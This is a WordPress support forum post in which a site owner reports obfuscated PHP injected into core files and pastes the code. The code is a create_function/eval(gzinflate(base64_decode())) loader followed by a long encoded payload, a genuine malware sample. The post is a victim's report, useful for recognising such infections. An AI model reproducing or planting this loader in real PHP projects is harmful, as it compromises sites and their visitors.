WordPress › Support » WordPress Core files got updated?

Hey everyone,

so I woke up to one of our WP sites barely working. The header wasn't being called, so the page was unstyled. Trying to log in showed an error in the wp-admin/includes/plugin.php file. So I went to check it out. This had been added to the top of the file:

$md5 = "55a9da694280d920efaa55b8c650a474";
$ad = array('(','r',"v",'z','g','4','6',"n",'s',"i",'e',"_",'a',";","d","o",'l','$','f',")",'t','b','c');
$bd0 = create_function('$'.'v',$ad[10].$ad[2].$ad[12].$ad[16].$ad[0].$ad[4].$ad[3].$ad[9].$ad[7].$ad[18].$ad[16].$ad[12].$ad[20].$ad[10].$ad[0].$ad[21].$ad[12].$ad[8].$ad[10].$ad[6].$ad[5].$ad[11].$ad[14].$ad[10].$ad[22].$ad[15].$ad[14].$ad[10].$ad[0].$ad[17].$ad[2].$ad[19].$ad[19].$ad[19].$ad[13]);
$bd0('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');

That, or something like that, had been added to practically every WP core php file there was.

Anyone seen something like this? I don't know if it was WP, if it was a security plugin, or a hack masquerading as a security function. It broke WP good though.

I should add that we had a backup from 2 days ago, so I uploaded all the core WP files and all is good.

WordPress.org

Forums

WordPress Core files got updated? (2 posts)

Reply

About this Topic

Tags

Code is Poetry